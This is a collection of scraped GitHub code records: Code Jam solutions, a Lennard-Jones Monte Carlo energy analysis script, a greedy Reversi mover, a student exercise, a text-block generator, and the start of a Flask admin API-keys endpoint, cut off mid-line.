+{"seq_id":"23416984271","text":"input = [x.strip() for x in open('A-small-attempt0.in', 'r')]\r\noutput = open('output.txt', 'w')\r\n\r\ncase_num = int(input[0])\r\n\r\nfor i in range(case_num):\r\n answer1 = int(input[i * 10 + 1])\r\n cards1 = [int(x) for x in input[i * 10 + 1 + answer1].split(' ')]\r\n answer2 = int(input[i * 10 + 6])\r\n cards2 = [int(x) for x in input[i * 10 + 6 + answer2].split(' ')]\r\n possible_cards = [x for x in cards1 if x in cards2]\r\n possibilities = len(possible_cards)\r\n \r\n output.write(\"Case #%s: \" % (i + 1))\r\n \r\n if possibilities == 1:\r\n output.write(\"%s\" % possible_cards[0])\r\n elif possibilities > 1:\r\n output.write('Bad magician!')\r\n else:\r\n output.write('Volunteer cheated!')\r\n \r\n output.write(\"\\n\")\r\n\r\n\r\n\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3514.py","file_name":"3514.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"14738678308","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.axes_grid1.inset_locator import zoomed_inset_axes\nfrom mpl_toolkits.axes_grid1.inset_locator import mark_inset\n\n\"\"\"Read the file with the Metropolis Kob-Anderson LJ Binary \nMixture Data using the Canonical Ensemble sampling method.\"\"\"\nf = open('Metropolis_Large_MC_FCC_50000_RDF_5000_rho_1.2_delta_0.1_T_1.out', 'r')\n\n# read in the contents\ncontents = f.readlines()\n\n# baseline sigma value\nsigma = contents[1]\nsigma = float(sigma)\n\n# sigma_aa value (distance between a-a spheres)\nsigma_aa = contents[3]\nsigma_aa = float(sigma_aa)\n\n# sigma_bb value (distance between b-b spheres)\nsigma_bb = contents[5]\nsigma_bb = float(sigma_bb)\n\n# sigma_ab value (distance between a-b spheres)\nsigma_ab = contents[7]\nsigma_ab = float(sigma_ab)\n\n# read in temperature of system\nT = contents[9]\nT = float(T)\n\n# read in baseline energy constant epsilon\nepsilon = contents[11]\nepsilon = float(epsilon)\n\n# epsilon_aa (energy constant between a-a spheres)\nepsilon_aa = contents[13]\nepsilon_aa = float(epsilon_aa)\n\n# epsilon_bb (energy constant between b-b spheres)\nepsilon_bb = contents[15]\nepsilon_bb = float(epsilon_bb)\n\n# epsilon_ab (energy constant between a-b spheres)\nepsilon_ab = contents[17]\nepsilon_ab = float(epsilon_ab)\n\n# reduced density parameter of system, rho\nrho = contents[19]\nrho = float(rho)\nrho = round(rho, 3)\n\n# total number of spheres\nn_total = contents[21]\nn_total = int(n_total)\n\n# fraction of a-type spheres (should be about 80%)\nx_a = contents[23]\nx_a = float(x_a)\n\n# fraction of b-type spheres (should be about 20%)\nx_b = contents[25]\nx_b = float(x_b)\nx_b = round(x_b, 2)\n\n# packing fraction phi\nphi = contents[27]\nphi = float(phi)\n\n# distance of the positive side of the uniform distribution\ndelta = contents[29]\ndelta = float(delta)\n\n# total number of MC steps taken in the simulation\nMC_steps = contents[31]\nMC_steps = int(MC_steps)\n\n\"\"\"Total number of RDF values averaged at the end w/out \nrelaxation time (i.e. 
for 50,000 MC steps and skipping\naverages for 10 MC steps, the number of RDFs averaged will\nbe 5,000 for the final averaged RDF.)\"\"\"\nRDF_ideal = contents[33]\nRDF_ideal = int(RDF_ideal)\n\n# define this value to simplify reading lines\nskip = RDF_ideal\n\n# relazation time if one is given before-hand (this is usually 0)\nt_relax = contents[35]\nt_relax = int(t_relax)\n\n\"\"\"Read in spheres list (this labels the particles with sphere\ntypes a and b, where a value of 1 represents an a-type and a\nvalue of 0 represents a b-type).\"\"\" \nspheres = []\nsphere_list = contents[3*n_total+40:4*n_total+40]\n\nfor line in sphere_list:\n\tspheres.append(int(line))\n\n# total a and b sphere numbers\nA_spheres = contents[4*n_total+40]\nspheres_a = contents[4*n_total+41]\nspheres_a = float(spheres_a)\nB_spheres = contents[4*n_total+42]\nspheres_b = contents[4*n_total+43]\nspheres_b = float(spheres_b)\n\n# moves accepted\naccept_statement = contents[(7+3*skip)*n_total+(47+3*skip)]\naccept = contents[(7+3*skip)*n_total+(48+3*skip)]\naccept = int(accept)\n\n# moves rejected\nreject_statement = contents[(7+3*skip)*n_total+(49+3*skip)]\nreject = contents[(7+3*skip)*n_total+(50+3*skip)]\nreject = int(reject)\n\n# Acceptance percentage\nper_accept_statement = contents[(7+3*skip)*n_total+(51+3*skip)]\nper_accept_met = contents[(7+3*skip)*n_total+(52+3*skip)]\nper_accept_met = float(per_accept_met)\nper_accept_met = np.round(per_accept_met, 1)\n\n# Exact RDF numbers (if the RDF_number = RDF_ideal, then the\n# difference is zero)\nRDF_statement = contents[(7+3*skip)*n_total+(53+3*skip)]\nRDF_number = contents[(7+3*skip)*n_total+(54+3*skip)]\nRDF_number = int(RDF_number)\nRDF_difference = RDF_ideal - RDF_number\n\n# number of bins used in the RDF histogram (usually 300)\nNbins_statement = contents[(7+3*skip)*n_total+(55+3*skip)]\nNbins = contents[(7+3*skip)*n_total+(56+3*skip)]\nNbins = int(Nbins)\n\n# extract energies from canonical ensemble sampling simulation\nenergies_met = []\nenergy = contents[(7+3*skip)*n_total+4*Nbins+(62+3*skip):(7+3*skip)*n_total+4*Nbins+(62+3*skip)+RDF_number]\n\nfor line in energy:\n\tenergies_met.append(float(line))\n\nf.close()\n\n# define array of MC steps taken in simulation\niterations_met = np.linspace(RDF_difference+0,RDF_ideal+0-1,RDF_number)\niterations_met = np.array(iterations_met)\n\n\"\"\"Define landscape energy from Kob-Andersen curve of best fit.\nThis is E_L = 2.639*T^0.6 - 8.656. 
This is the same value used\nin both the canonical and PEL ensembles for comparisons of the\nsame temperature/energy values.\"\"\"\nenergy_land = -8.656 + 2.639*T**0.6\nenergy_land = np.round(energy_land, 3)\nlandscape_energy = np.zeros(RDF_number)\nfor i in range(0,RDF_number):\n landscape_energy[i] = energy_land\n\n# define total average energies as an array\nenergies_met = np.array(energies_met)\nenergies_ave_met = energies_met/n_total\n\n# calculate cumulative average energies\nenergies_cumul_met = np.zeros(RDF_number)\nenergies_cumul_ave_met = np.zeros(RDF_number)\nfor i in range(RDF_number):\n\tfor j in range(i+1):\n\t\tenergies_cumul_met[i] += energies_ave_met[j]\n\n# final cumulative average energies\nfor i in range(RDF_number):\n\tenergies_cumul_ave_met[i] = energies_cumul_met[i]/(i+1)\n\nf = open('Cumulative_Energies_Canonical_T_1.out', 'w')\n\nf.write('Cumulative Canonical Ensemble Energies at T*=1\\n')\nfor val in energies_cumul_ave_met:\n f.write(\"{:}\\n\".format(val))\n\nf.close()\n\n# calculate the average energy of the average energies and \n# the standard deviation of the average energies\ntotal_energy = 0\nenergy_diff = 0\nfor i in range(0,RDF_ideal):\n total_energy += energies_met[i]\nmean_energy_met = total_energy/(n_total*RDF_ideal)\nmean_energy_met = round(mean_energy_met, 3)\nfor i in range(0,RDF_ideal):\n energy_diff += (energies_ave_met[i] - mean_energy_met)**2\nstand_dev = np.sqrt(energy_diff/((RDF_ideal-1)*RDF_ideal))\nstand_dev = round(stand_dev, 3)\nmean_energies_met = np.zeros(RDF_ideal)\nfor i in range(0,RDF_ideal):\n mean_energies_met[i] = mean_energy_met\n \n# calculate average and standard deviation/error of cumulative\n# average energies\nenergy_cumul_diff_met = 0\nmean_cumul_energy_met = 0\nstand_dev_met = 0\nmean_cumul_energy_met = np.sum(energies_cumul_ave_met[0:RDF_ideal+1], \n axis = 0)/(RDF_number)\nfor i in range(0,RDF_ideal):\n energy_cumul_diff_met += (energies_cumul_ave_met[i] - \n mean_cumul_energy_met)**2\nstand_dev_met = np.sqrt(energy_cumul_diff_met/(RDF_ideal-1))\nstand_error_met = stand_dev_met/(np.sqrt(RDF_ideal))\n\n\"\"\"Read the file with the Metropolis Kob-Anderson LJ Binary \nMixture Data using the PEL sampling method.\"\"\"\nf = open('Nonbias_PEL_50000_MC_Uniform_delta_0.1_T_1_.out', 'r')\n\n# read in the contents\ncontents = f.readlines()\n\n# baseline sigma value\nsigma = contents[1]\nsigma = float(sigma)\n\n# sigma_aa value (distance between a-a spheres)\nsigma_aa = contents[3]\nsigma_aa = float(sigma_aa)\n\n# sigma_bb value (distance between b-b spheres)\nsigma_bb = contents[5]\nsigma_bb = float(sigma_bb)\n\n# sigma_ab value (distance between a-b spheres)\nsigma_ab = contents[7]\nsigma_ab = float(sigma_ab)\n\n# read in the energy-equivalent temperature of system\nT = contents[9]\nT = float(T)\n\n# read in baseline energy constant epsilon\nepsilon = contents[11]\nepsilon = float(epsilon)\n\n# epsilon_aa (energy constant between a-a spheres)\nepsilon_aa = contents[13]\nepsilon_aa = float(epsilon_aa)\n\n# epsilon_bb (energy constant between b-b spheres)\nepsilon_bb = contents[15]\nepsilon_bb = float(epsilon_bb)\n\n# epsilon_ab (energy constant between a-b spheres)\nepsilon_ab = contents[17]\nepsilon_ab = float(epsilon_ab)\n\n# reduced density parameter of system, rho\nrho = contents[19]\nrho = float(rho)\nrho = round(rho, 3)\n\n# total number of spheres\nn_total = contents[21]\nn_total = int(n_total)\n\n# fraction of a-type spheres (should be about 80%)\nx_a = contents[23]\nx_a = float(x_a)\n\n# fraction of b-type spheres (should 
be about 20%)\nx_b = contents[25]\nx_b = float(x_b)\nx_b = round(x_b, 2)\n\n# packing fraction phi\nphi = contents[27]\nphi = float(phi)\n\n\"\"\"Parameter used in the more complete version of the PEL model.\nFor the baseline PEL sampling scheme, this is always 0.5\"\"\"\na = contents[29]\na = float(a)\n\n\"\"\"If the Gaussian distribution is used as the basis of the Monte\nCarlo simulation, then this parameter is used. This parameter\nis equal to 1/(2*variance). This parameter can be ignored when\nthe uniform distribution is employed.\"\"\"\nalpha = contents[31]\nalpha = float(alpha)\n\n# total number of MC steps taken in the simulation\nMC_steps = contents[33]\nMC_steps = int(MC_steps)\n\n\"\"\"Total number of RDF values averaged at the end w/out \nrelaxation time (i.e. for 50,000 MC steps and skipping\naverages for 10 MC steps, the number of RDFs averaged will\nbe 5,000 for the final averaged RDF.)\"\"\"\nRDF_ideal = contents[35]\nRDF_ideal = int(RDF_ideal)\n\n# relazation time if one is given before-hand (this is usually 0)\nt_relax = contents[37]\nt_relax = int(t_relax)\n\n# length and volume of box\nbox_length = 10\nV = box_length**3\n\n# define this value to simplify reading lines\nskip = RDF_ideal\n\n\"\"\"Read in spheres list (this labels the particles with sphere\ntypes a and b, where a value of 1 represents an a-type and a\nvalue of 0 represents a b-type).\"\"\" \nspheres = []\nsphere_list = contents[3*n_total+42:4*n_total+42]\n\nfor line in sphere_list:\n\tspheres.append(int(line))\n\n\"\"\"Define matrices which will store all x, y, and z coordinates\nper time slice as row vectors. This runs through the total\nnumber of time slices up to RDF_ideal.\"\"\"\nxs_new = np.zeros((RDF_ideal,n_total))\nys_new = np.zeros((RDF_ideal,n_total))\nzs_new = np.zeros((RDF_ideal,n_total))\n\n# read in all x, y, and z coordinates stored as row vectors in\n# the matrices above\nfor i in range(0,RDF_ideal):\n\txs_new[i] = contents[(4+3*i)*n_total+(47+3*i):(5+3*i)*n_total+(47+3*i)]\n\tys_new[i] = contents[(5+3*i)*n_total+(48+3*i):(6+3*i)*n_total+(48+3*i)]\n\tzs_new[i] = contents[(6+3*i)*n_total+(49+3*i):(7+3*i)*n_total+(49+3*i)]\n\n# moves accepted\naccept_statement = contents[(7+3*skip)*n_total+(49+3*skip)]\naccept = contents[(7+3*skip)*n_total+(50+3*skip)]\naccept = int(accept)\n\n# moves rejected\nreject_statement = contents[(7+3*skip)*n_total+(51+3*skip)]\nreject = contents[(7+3*skip)*n_total+(52+3*skip)]\nreject = int(reject)\n\n# Acceptance percentage\nper_accept_statement = contents[(7+3*skip)*n_total+(53+3*skip)]\nper_accept = contents[(7+3*skip)*n_total+(54+3*skip)]\nper_accept = float(per_accept)\nper_accept = np.round(per_accept, 1)\nper_accept_PEL = per_accept\n\n# Exact RDF numbers (if the RDF_number = RDF_ideal, then the\n# difference is zero)\nRDF_statement = contents[(7+3*skip)*n_total+(55+3*skip)]\nRDF_number = contents[(7+3*skip)*n_total+(56+3*skip)]\nRDF_number = int(RDF_number)\nRDF_difference = RDF_ideal - RDF_number\n\n# number of bins used in the RDF histogram (usually 300)\nNbins_statement = contents[(7+3*skip)*n_total+(57+3*skip)]\nNbins = contents[(7+3*skip)*n_total+(58+3*skip)]\nNbins = int(Nbins)\n\nf.close()\n\n# define energies and set counting to 0\nenergies = []\nNgr = 0\n\n# Calculate constants to be used in potentials and forces\nepsilon_aa_4 = 4*epsilon_aa\nepsilon_bb_4 = 4*epsilon_bb\nepsilon_ab_4 = 4*epsilon_ab\nepsilon_aa_24 = 24*epsilon_aa\nepsilon_bb_24 = 24*epsilon_bb\nepsilon_ab_24 = 24*epsilon_ab\nsigma_aa_6 = sigma_aa**6\nsigma_bb_6 = 
sigma_bb**6\nsigma_ab_6 = sigma_ab**6\nsigma_aa_12 = sigma_aa**12\nsigma_bb_12 = sigma_bb**12\nsigma_ab_12 = sigma_ab**12\nsigma_aa_2_12 = 2*sigma_aa_12\nsigma_bb_2_12 = 2*sigma_bb_12\nsigma_ab_2_12 = 2*sigma_ab_12\nV_aa_max = epsilon_aa_4*((2/5)**12 - (2/5)**6)\nV_bb_max = epsilon_bb_4*((2/5)**12 - (2/5)**6)\nV_ab_max = epsilon_ab_4*((2/5)**12 - (2/5)**6)\n\n# Calculate energies based on all sphere-type interactions. \n# Append total energies to energies list.\nfor i in range(0,RDF_ideal):\n # if i%skip == 0: # relaxation time\n Ngr += 1 # count the RDF calculation number\n print(Ngr)\n V_LJ_total = 0\n for j in range(0,n_total-1):\n for k in range(j+1,n_total):\n if spheres[j] == spheres[k]:\n # calculate RDF for type A-A spheres\n if spheres[j] == 0:\n xr_aa_now = xs_new[i,j] - xs_new[i,k] \n yr_aa_now = ys_new[i,j] - ys_new[i,k]\n zr_aa_now = zs_new[i,j] - zs_new[i,k]\n xr_aa_now = xr_aa_now - box_length*np.round(xr_aa_now/box_length)\n yr_aa_now = yr_aa_now - box_length*np.round(yr_aa_now/box_length)\n zr_aa_now = zr_aa_now - box_length*np.round(zr_aa_now/box_length)\n r_aa_now = np.sqrt(xr_aa_now**2 + yr_aa_now**2 + zr_aa_now**2)\n r_aa_now_6 = r_aa_now**6\n r_aa_now_12 = r_aa_now**12\n # Calculate energies\n if r_aa_now > 2.5*sigma_aa:\n V_LJ_now = 0\n else:\n V_LJ_now = epsilon_aa_4*((sigma_aa_12/r_aa_now_12) - \n (sigma_aa_6/r_aa_now_6)) - V_aa_max\n V_LJ_total += V_LJ_now\n \n # calculate RDF for type B-B spheres\n elif spheres[j] == 1:\n xr_bb_now = xs_new[i,j] - xs_new[i,k] \n yr_bb_now = ys_new[i,j] - ys_new[i,k]\n zr_bb_now = zs_new[i,j] - zs_new[i,k]\n xr_bb_now = xr_bb_now - box_length*np.round(xr_bb_now/box_length)\n yr_bb_now = yr_bb_now - box_length*np.round(yr_bb_now/box_length)\n zr_bb_now = zr_bb_now - box_length*np.round(zr_bb_now/box_length)\n r_bb_now = np.sqrt(xr_bb_now**2 + yr_bb_now**2 + zr_bb_now**2)\n r_bb_now_6 = r_bb_now**6\n r_bb_now_12 = r_bb_now**12\n # Calculate energies\n if r_bb_now > 2.5*sigma_bb:\n V_LJ_now = 0\n else:\n V_LJ_now = epsilon_bb_4*((sigma_bb_12/r_bb_now_12) - \n (sigma_bb_6/r_bb_now_6)) - V_bb_max\n V_LJ_total += V_LJ_now\n \n # calculate RDF for type A-B spheres\n elif spheres[j] != spheres[k]:\n xr_ab_now = xs_new[i,j] - xs_new[i,k] \n yr_ab_now = ys_new[i,j] - ys_new[i,k]\n zr_ab_now = zs_new[i,j] - zs_new[i,k]\n xr_ab_now = xr_ab_now - box_length*np.round(xr_ab_now/box_length)\n yr_ab_now = yr_ab_now - box_length*np.round(yr_ab_now/box_length)\n zr_ab_now = zr_ab_now - box_length*np.round(zr_ab_now/box_length)\n r_ab_now = np.sqrt(xr_ab_now**2 + yr_ab_now**2 + zr_ab_now**2)\n r_ab_now_6 = r_ab_now**6\n r_ab_now_12 = r_ab_now**12\n # Calculate energies\n if r_ab_now > 2.5*sigma_ab:\n V_LJ_now = 0\n else:\n V_LJ_now = epsilon_ab_4*((sigma_ab_12/r_ab_now_12) - \n (sigma_ab_6/r_ab_now_6)) - V_ab_max\n V_LJ_total += V_LJ_now\n\n # Append total energies to energies list\n energies.append(V_LJ_total)\n\n# turn total energies into array\nenergies_PEL = np.array(energies)\n\n\"\"\"Calculate average energies and set initial energy to same\ninitial energy as that in the canonical ensemble simulation.\nBoth simulations started at this energy.\"\"\"\nenergies_ave_PEL = energies_PEL/n_total\nenergies_ave_PEL[0] = energies_ave_met[0]\n\n# Calculate cumulative average energies from PEL ensemble\nenergies_cumul_ave_PEL = np.zeros(RDF_ideal)\nfor i in range(RDF_ideal):\n\tenergies_cumul_ave_PEL[i] = np.sum(energies_ave_PEL[:i+1], \n axis = 0)/(i+1)\n\nf = open('Cumulative_Energies_PEL_T_1.out', 'w')\n\nf.write('PEL Ensemble Cumulative Energies at 
T*=1\\n')\nfor val in energies_cumul_ave_PEL:\n f.write(\"{:}\\n\".format(val))\n\nf.close()\n\n# define the array of MC steps taken in the simulation\niterations_PEL = np.linspace(RDF_difference,RDF_ideal-1,RDF_ideal)\niterations_PEL = np.array(iterations_PEL)\n\n# calculate the average energy of the average energies and \n# the standard deviation of the average energies\ntotal_energy = 0\nenergy_diff = 0\nfor i in range(0,RDF_ideal):\n\ttotal_energy += energies_PEL[i]\nmean_energy_PEL = total_energy/(n_total*RDF_ideal)\nmean_energy_PEL = round(mean_energy_PEL, 3)\nfor i in range(0,RDF_ideal):\n\tenergy_diff += (energies_ave_PEL[i] - mean_energy_PEL)**2\nstand_dev = np.sqrt(energy_diff/((RDF_ideal-1)*RDF_ideal))\nstand_dev = round(stand_dev, 3)\nmean_energies_PEL = np.zeros(RDF_ideal)\nfor i in range(0,RDF_ideal):\n\tmean_energies_PEL[i] = mean_energy_PEL\n\t\n# calculate average and standard deviation/error of cumulative\n# average energies\nenergy_cumul_diff_PEL = 0\nmean_cumul_energy_PEL = 0\nstand_dev_PEL = 0\nmean_cumul_energy_PEL = np.sum(energies_cumul_ave_PEL[0:RDF_ideal+1], \n axis = 0)/(RDF_number)\nfor i in range(0,RDF_ideal):\n\tenergy_cumul_diff_PEL += (energies_cumul_ave_PEL[i] - \n mean_cumul_energy_PEL)**2\nstand_dev_PEL = np.sqrt(energy_cumul_diff_PEL/(RDF_ideal-1))\nstand_error_PEL = stand_dev_PEL/(np.sqrt(RDF_ideal))\n\n# Color scheme using color-blind friendly colors\nCB_color_cycle = ['c', 'm', 'sienna', 'k','y','salmon']\n\n# Ensures correct number of MC steps (this should be 10)\nn_skip = MC_steps/RDF_ideal\n\n# Plot average energies of canonical ensemble simulation\nplt.figure(figsize=(10,5))\nplt.subplot(1,2,1)\nax1 = plt.subplot(1,2,1)\nplt.plot(n_skip*iterations_met[:],energies_ave_met[:],\n c = CB_color_cycle[0], alpha = 0.8)\nplt.plot(n_skip*iterations_met[:],mean_energies_met[:], \n c = CB_color_cycle[1])\nplt.plot(n_skip*iterations_met[:],landscape_energy[:], \n c = 'black')\nplt.legend(('Canonical Ensemble /N','Average Energy: {}'.\n format(mean_energy_met),'Landscape Energy: {}'.\n format(energy_land)), loc = 'lower center')\nplt.xlabel('MC Steps')\nplt.ylabel('Average Potential Energy per Particle')\n\n# Plot average energies of PEL ensemble simulation\nplt.subplot(1,2,2)\nax2 = plt.subplot(1,2,2)\nplt.plot(n_skip*iterations_PEL[:],energies_ave_PEL[:], \n c = CB_color_cycle[0], alpha = 0.8)\nplt.plot(n_skip*iterations_PEL[:],mean_energies_PEL[:], \n c = CB_color_cycle[1])\nplt.plot(n_skip*iterations_PEL[:],landscape_energy[:RDF_number], \n c = 'black')\nplt.legend(('PEL Ensemble /N','Average Energy: {}'.\n format(mean_energy_PEL),'Landscape Energy: {}'.\n format(energy_land)), loc = 'lower center')\nplt.xlabel('MC Steps')\n\n# Plot cumulative average energies\nfig,ax1 = plt.subplots()\nax1.plot(n_skip*iterations_met[:5000],energies_cumul_ave_met[:5000], \n c = CB_color_cycle[0])\nax1.plot(n_skip*iterations_PEL,energies_cumul_ave_PEL, \n c = CB_color_cycle[1], linestyle = 'dashed')\nax1.plot(n_skip*iterations_met[:5000],landscape_energy[:5000], c = 'black')\nax1.legend(('Canonical','PEL','landscape energy: {}'.format(energy_land)),\n loc = 'lower right', prop = {\"size\":12})\nplt.xlabel('MC Steps', fontsize = 15) # (n = {}, step size = {}$\\sigma$)'.format(n_total,np.round(1/np.sqrt(2*alpha)/sigma, 2)), fontsize = 12.5)# t_relax))\nplt.ylabel(r'Cumulative $(\\langle V \\rangle - E_{L})/(N\\epsilon)$', \n fontsize = 15)\nplt.ylim(-6.5,-4.0) # use for T*=2\n# plt.ylim(-6.5,-5.75) # use for T*=1\n# plt.ylim(-6.5,-6.0) # use for T*=0.75\n# 
plt.ylim(-6.55,-6.0) # use for T*=0.725\n\n# adjust inset position as needed\naxins = zoomed_inset_axes(ax1, zoom = 2.5, bbox_to_anchor=(1050,650))\naxins.plot(n_skip*iterations_met[:5000],energies_cumul_ave_met[:5000], \n c = CB_color_cycle[0]) # plot canonical within inset only for T*=2\naxins.plot(n_skip*iterations_PEL,energies_cumul_ave_PEL, \n c = CB_color_cycle[1], linestyle = 'dashed')\naxins.plot(n_skip*iterations_met[:5000],landscape_energy[:5000], \n c = 'black')\naxins.set_xlim(0,10000)\naxins.set_ylim(-5.0,-4.5) # use for T*=2\n# axins.set_ylim(-6.05,-6.0) # use for T*=1\n# axins.set_ylim(-6.46,-6.42) # use for T*=0.75 \n# axins.set_ylim(-6.49,-6.47) # use for T*=0.725\nmark_inset(ax1, axins, loc1 = 1, loc2 = 3)\n\nplt.show()\n","repo_name":"josephfichera314/PEL-Convergence","sub_path":"Energy Results/Raw_Energies.py","file_name":"Raw_Energies.py","file_ext":"py","file_size_in_byte":19917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23593149681","text":"import sys\n\ndef main(argv):\n ifilename = argv[1]\n ofilename = argv[2]\n ifile = open(ifilename, 'r')\n numlines = ifile.readline()\n ofile = open(ofilename, 'w')\n numlines = numlines.strip();\n num = int(numlines)\n labeler = Labeler()\n \n for i in range(num):\n dimensions = ifile.readline().strip().split(\" \")\n H,W = int(dimensions[0]),int(dimensions[1])\n altitudes = []\n ofile.write(\"Case #\"+str(i+1)+\":\\n\")\n for y in range(H):\n a = ifile.readline().strip().split(\" \")\n b = []\n for x in range(W):\n b.append(int(a[x]))\n altitudes.append(b)\n \n labels = labeler.generateLabels(altitudes, H, W)\n \n for y in range(H):\n for x in range(W):\n ofile.write(labels[y][x]+\" \")\n ofile.write(\"\\n\")\n \n ifile.close()\n ofile.close()\n\nclass Labeler:\n \n sink = -1\n north = 0\n west = 1\n east = 2\n south = 3\n \n directions = []\n labels = []\n alphabet = \"abcdefghijklmnopqrstuvwxyz\"\n \n def generateLabels(self, altitudes, H, W):\n self.directions = [ [self.sink for x in range(W)] for y in range(H) ]\n for y in range(H):\n for x in range(W):\n least = altitudes[y][x]\n direction = self.sink\n if -1 < x < W and -1 < y-1 < H and altitudes[y-1][x] < least:\n least = altitudes[y-1][x]\n self.directions[y][x] = self.north\n if -1 < x-1 < W and -1 < y < H and altitudes[y][x-1] < least:\n least = altitudes[y][x-1]\n self.directions[y][x] = self.west\n if -1 < x+1 < W and -1 < y < H and altitudes[y][x+1] < least:\n least = altitudes[y][x+1]\n self.directions[y][x] = self.east\n if -1 < x < W and -1 < y+1 < H and altitudes[y+1][x] < least:\n self.directions[y][x] = self.south\n \n self.reallyGenerateLabels(H, W)\n return self.labels\n \n def reallyGenerateLabels(self, H, W):\n self.labels = [ [\"\" for x in range(W)] for y in range(H) ]\n #print self.directions\n self.nextlabel = 0\n for y in range(H):\n for x in range(W):\n #print \"===============================\"\n #print self.labels\n self.findLabel(x,y)\n \n def findLabel(self, x, y):\n #print \"(\"+str(y)+\",\"+str(x)+\") - \"\n if self.labels[y][x] != \"\":\n return\n #print \"already set\"\n elif self.directions[y][x] == self.sink:\n self.labels[y][x] = self.alphabet[self.nextlabel]\n #print \"sink \"+self.alphabet[self.nextlabel]\n self.nextlabel += 1\n elif self.directions[y][x] == self.north:\n #print \"going north\"\n if self.labels[y-1][x] == \"\":\n self.findLabel(x,y-1)\n self.labels[y][x] = self.labels[y-1][x]\n elif self.directions[y][x] == self.west:\n #print \"going west\"\n if self.labels[y][x-1] == \"\":\n self.findLabel(x-1,y)\n self.labels[y][x] = self.labels[y][x-1]\n elif self.directions[y][x] == self.east:\n #print \"going east\"\n if self.labels[y][x+1] == \"\":\n self.findLabel(x+1,y)\n self.labels[y][x] = self.labels[y][x+1]\n elif self.directions[y][x] == self.south:\n #print \"going south\"\n if self.labels[y+1][x] == \"\":\n self.findLabel(x,y+1)\n self.labels[y][x] = self.labels[y+1][x]\n\nif __name__ == '__main__':\n main(sys.argv)","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_35/200.py","file_name":"200.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"73118364675","text":"import core\r\nimport copy\r\n\r\ndef get_move(board, player):\r\n return get_move_greedy(board, player)\r\n \r\ndef get_move_greedy(board,player):\r\n # test.print_board(board)\r\n board_copy = copy.deepcopy(board)\r\n valid_moves = core.get_valid_moves(board_copy,player)\r\n if len(valid_moves) == 0:\r\n return \"NO MOVES\"\r\n else:\r\n #iterate on all moves\r\n bestMove = valid_moves[0]\r\n minScore= core.get_score(board)[player]\r\n for move in valid_moves:\r\n board_copy = copy.deepcopy(board)\r\n core.make_move(board_copy,move[0],move[1],player)\r\n #check if move is better\r\n print(\"move is: \",move,\" score is: \",core.get_score(board_copy)[player])\r\n if core.get_score(board_copy)[player] > minScore:\r\n bestMove = move\r\n minScore = core.get_score(board_copy)[player]\r\n print(\"best move is: \",bestMove)\r\n bestMove = convertToTuple(bestMove)\r\n return bestMove\r\n \r\n#convert (2,2) to (c3)\r\ndef convertToTuple(move):\r\n x = chr(move[0]+97)\r\n y = move[1]+1\r\n return x+str(y)\r\n\r\n","repo_name":"Abdur-Rahman-Khan/Reversi-Game","sub_path":"mover.py","file_name":"mover.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"33268920844","text":"\r\n# Recitation Lab 2 Question 3: Program to display assignment score\r\n# Author: Asmit De\r\n# Date: 01/26/2017\r\n\r\nassignment = input('Enter the assignment name: ')\r\ntotalpoints = input('Enter the total points: ')\r\nscore = input('Enter your score: ')\r\n\r\nprint('\\nYou scored', score, 'out of', totalpoints, 'in', assignment)\r\n","repo_name":"asmitde/TA-PSU-CMPSC101","sub_path":"Spring 2017/Recitations/Lab2/Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"31692707336","text":"# -*- coding: utf-8 -*-\r\n#until.py 文本块生成器\r\nimport logging\r\nimport logging.config\r\nlogging.config.fileConfig('logging.conf')\r\n\r\n# create logger\r\nroot_logger = logging.getLogger('root')\r\nmain_logger = logging.getLogger('main.util')\r\n\r\n# 'application' code\r\nmain_logger.info(\"你好我们的文本标记项目开始了!\")\r\ndef lines(file):\r\n for line in file:\r\n yield line #收集所遇到的行,\r\n main_logger.debug(\"line : %s\" % line)\r\n yield '\\n' #确保文件的最后一行是空行,否则就不知程序什么时候结束\r\n\r\ndef blocks(file):\r\n block = []\r\n\r\n for line in lines(file):\r\n if line.strip():\r\n block.append(line)\r\n elif block != []:\r\n yield ''.join(block).strip() #把列表连接成字符串\r\n main_logger.debug(\"block is %s \" % block)\r\n block = []\r\n","repo_name":"liulin1840/learn_python","sub_path":"mark/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24041373557","text":"\"\"\"\n **api keys system admin module**\n controls access to api keys for system admin application\n\"\"\"\n\n__developer__ = \"mobius-crypt\"\n__email__ = \"mobiusndou@gmail.com\"\n__twitter__ = \"@blueitserver\"\n__github_repo__ = \"https://github.com/freelancing-solutions/memberships-and-affiliate-api\"\n__github_profile__ = \"https://github.com/freelancing-solutions/\"\n__licence__ = \"MIT\"\n\nimport hmac\nfrom typing import Optional\nfrom flask import Blueprint, request, current_app\n\nfrom config import config_instance\nfrom config.exceptions import UnAuthenticatedError, error_codes\nfrom security.apps_authenticator import handle_apps_authentication, verify_secret_key\nfrom views import api_keys_view\n\nadmin_api_keys_api_bp = Blueprint(\"admin_api_keys_api\", __name__)\n\n\n@admin_api_keys_api_bp.route('/_api/v1/admin/api-keys/', methods=[\"POST\"])\n@handle_apps_authentication\ndef api_keys(path: str) -> tuple:\n \"\"\"\n **api_keys**\n system admin api keys endpoint\n\n :param path:\n :return: results depending on path\n \"\"\"\n json_data: dict = request.get_json()\n secret_key: Optional[str] = json_data.get('SECRET_KEY')\n verify_secret_key(secret_key)\n\n if path == \"get-all\":\n organization_id = is_admin_user(json_data)\n return api_keys_view.return_all_organization_keys(organization_id=organization_id)\n elif path == \"return-active-org-keys\":\n organization_id = is_admin_user(json_data)\n return api_keys_view.return_active_organization_keys(organization_id=organization_id)\n elif path == 